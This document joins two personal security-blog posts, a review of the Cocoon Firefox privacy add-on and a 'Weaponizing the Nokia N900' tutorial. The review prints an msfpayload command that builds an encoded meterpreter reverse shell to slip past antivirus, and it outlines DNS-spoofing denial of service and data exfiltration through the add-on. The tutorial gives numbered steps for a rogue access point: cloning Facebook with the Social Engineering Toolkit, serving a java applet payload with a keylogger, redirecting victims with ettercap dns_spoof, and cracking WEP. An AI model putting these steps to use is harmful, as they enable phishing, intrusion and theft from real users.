#!/zitstif.no-ip.org/

What is Cocoon? According to https://getcocoon.com/support/faq, it is:

“Cocoon is a service that protects your computer and your privacy when you are on the Internet. It’s a virus-free, secure, and private web experience. We shield your computer from the bad guys, and we protect your identity from prying eyes. It’s that simple.”

I would like to argue how ‘secure’ Cocoon is, but year after year, I think most information security specialists would agree that most things aren’t necessarily 100% secure. Semantics aside, I am still relatively impressed with this Firefox add-on, which can be obtained here.

Strengths of Cocoon:

Using tools like ettercap, sslstrip, webmitm, dnsspoof, and wireshark, I was not able to retrieve the login credentials that were used to sign on to Cocoon’s privacy service. The way they have implemented SSL with this plugin is probably one of the best SSL implementations I’ve seen in my humble opinion. (Although, it does use TLS version 1, which I think you should read about here.)

Even using webmitm and creating a self signed certificate pretty identical to the one that *.vworldc.com used, I was not able to log in to the service and I received this error message:

The implementation of SSL that the Cocoon developers have used is simply wonderful. For people who are on the road and have to bear using public wifi on a regular basis and don’t have access to a VPN server or using a socks5 proxy server via SSH, I believe that using HTTPS Everywhere and Cocoon in tandem would be a great defense against attackers who are on the same network.

Weaknesses of Cocoon:

Cocoon’s proxy service has an AV solution implemented. For instance, when you go to download an executable file when you’re using Cocoon, you will be prompted that the file has either passed the virus scan or hasn’t. In the case of if it has passed the scan, you are still given a warning about what kind of file it is. If the file has failed the AV scan, you won’t be able to download the file while using Cocoon.

With that being said, I thought I would put Cocoon’s AV solution to the test. Firstly, I tried accessing a benign but universally known ‘virus’ file that triggers all AV solutions:

EICAR.COM

Not so surprisingly, this file was flagged and I was warned. My next test was to try a meterpreter PE hosted on my own website, which I created using:

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 -o test.exe

(prior to running this string, I ran msfupdate of course). To my surprise, this file passed the AV scan done by Cocoon’s AV services. My next test was done using no encoders and yet again this passed the AV scan provided by Cocoon!

I even tried sbd.exe which is in the /pentest/windows-binaries/tools directory of BackTrack without modifying the file, yet it still passed Cocoon’s AV solution.

With Linux and OSX payloads from the Metasploit project, they passed the AV solution as well, but I was still warned that they were executable. Other file types that can trigger Cocoon’s AV solution are zip and tar.gz files. Yet .rar files triggered no alerts or prompts.

“We shield your computer from the bad guys”, pertaining to AV solutions, this is where Cocoon falls extremely short.

Network attacks against Cocoon:

As of the moment, the only attack I could do against Cocoon was a DOS attack. I simply used dnsspoof or ettercap (and the dns_spoof plugin)  and setup a hosts file with *.vworldc.com pointing to my IP address or a non-existing one.

What this means is that someone who’s in the same network as me and if I know they use Cocoon, I could do a DOS attack against them so they cannot access Cocoon’s services and then they would be forced to access the web ‘naked’.

Offensive uses of Cocoon:

One could use Cocoon for ex-filtrating data out of an organization to a foreign entity. For instance, if I’m agitated employee X at employer Y, I could install and use Cocoon to e-mail an attachment containing company private information to an out of jurisdiction web server.

Closing Words:

For those of you who people come to for information security related solutions, I would highly recommend that you check this Firefox add-on. As of the moment, it is free and free to use their service. Weaknesses aside, I still believe that this is a great defensive tool.

Thanks to Shawn Merdinger, from infosecisland for the inspiration and  thanks to many others in the information security community, I’m continuing with my ‘Weaponizing the Nokia N900’ series with another entry.

Firstly, I would like to mention that I’m contemplating on writing a program to automate the process of turning your N900 into a pentester’s device. This is largely due to the fact that the neopwn project seems to have come to a stand still. I have attempted contacting an individual from the neopwn project, however I haven’t had much luck.

In this post I will cover some of the other attacks you can carry out with your N900 as a rogue ap point using dns spoofing and David Kennedy‘s Social Engineering Toolkit. Along with that, I’ll give you information on how to get packet injection working so the aircrack suite is more useful to you.

Rogue AP Goodness:

1.) Download SET to your n900 and take note of this information:

a.) You’ll need to install some additional python modules  such as, python-crypto. Python-crypto is in the repositories if you have the extra repositorise that I mentioned  in an earlier post: http://zitstif.no-ip.org/?p=451

b.) I wasn’t able to find python-pexpect in the repositories, but luckily SET was able to download it and install it for me.

c.) If you’re planning on using metasploit in tandem with SET, you’ll need to do as follows:

ln -s /usr/bin/rub1.8 /usr/bin/ruby

Oddly enough, SET does not do a check for whether or not if you have ruby installed. I would implement something like this some where in the SET project:

http://zitstif.no-ip.org/setfix.txt

2.) See my earlier post on how to setup your n900 as a rogue ap point: http://zitstif.no-ip.org/?p=459 (Keep in mind though we’re going to inject a new step or two.)

3.) After step 4 (in the earlier rogue ap point instructions) load up SET and select number 2 for the website attack vectors section

4.) Select option 1 for the java applet attack method

5.) Now select the site cloner option

6.) Select a website to clone (Hmm anyone up for Facebook?! 😉 )

7.) For the payload, give SET’s own payload a try, it’s pretty powerful and you can even run a keylogger. In addition to that for the moment, this attack bypasses some AV solutions. (The system I tested this on was a fully patched Windows 7 x64 system that has Microsoft Security Essentials up to date, and I was able to get a session without any AV alarms going off.)

8.) Before you fire up ettercap, go to etter.dns and create an entry like this (especially if you’re using the mobilehotspot application)

www.facebook.com     A      10.105.242.1

9.) Now run this:

ettercap -i wlan0 -q -T -p -u // // -P dns_spoof

What I adore about this attack, is the java applet infection method. It’s a great social engineering method for gaining access to victim’s machines. Plus with SET, you don’t need sun-java6-jdk, which doesn’t appear to be available in the n900’s repositories.

I also wanted to note, that I wasn’t able to get the java applet to work against OSX systems or Linux systems. 🙁

Aircrack-ng goodness:

I was able to get packet injection working and was able to successfully use the chop-chop attack on a WEP network to create enough IVs and then crack the WEP key in about 10 minutes.

Please see this blog entry:

http://david.gnedt.eu/blog/wl1251/

Also pay close attention to:

http://david.gnedt.eu/wl1251/README

Be careful about using this driver because it seems to drain battery life quite quickly.

(Speaking of which..)

Additional notes:

One more tip I would like to share with fellow N900 owners on extending battery life is as follows:

-Uninstall applications that eat up a lot of CPU time and run in the background

-Disable your wifi connection if you’re not using it

-Dim the brightness of your screen

-Disable anything you don’t need or aren’t currently using

-Use an application to that allows you to switch between 3G and 2G networks. If you’re just using SMS and calling people, all you need is the 2G network. (In my humble opinion)

That’s all for now. As usual, more to come!